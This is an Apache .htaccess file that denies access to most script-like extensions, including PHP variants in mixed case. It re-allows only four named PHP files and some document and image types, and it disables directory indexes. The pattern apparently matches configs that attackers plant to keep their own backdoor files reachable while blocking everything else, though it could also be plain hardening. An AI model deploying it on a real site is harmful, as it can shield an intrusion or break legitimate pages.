<Files *.ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.a*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.Ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.S*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.pH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.PH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.s*>
    Order Deny,Allow
    Deny from all
</Files>

<FilesMatch "^(docs.php|error.php|index.php|function.php)$">
    Order allow,deny
    Allow from all
</FilesMatch>

<FilesMatch "\\.(ph.*|a.*|P[hH].*|S.*)$"> 
    Require all denied 
</FilesMatch>

<FilesMatch "\\.(jpg|jpeg|pdf|docx)$"> 
    Require all granted
</FilesMatch> 

<FilesMatch "^(docs.php|error.php|index.php|function.php)$"> 
    Require all granted 
</FilesMatch> 

DirectoryIndex  
Options -Indexes 

ErrorDocument 403 "403 Forbidden" 
ErrorDocument 404 "404 Not Found"
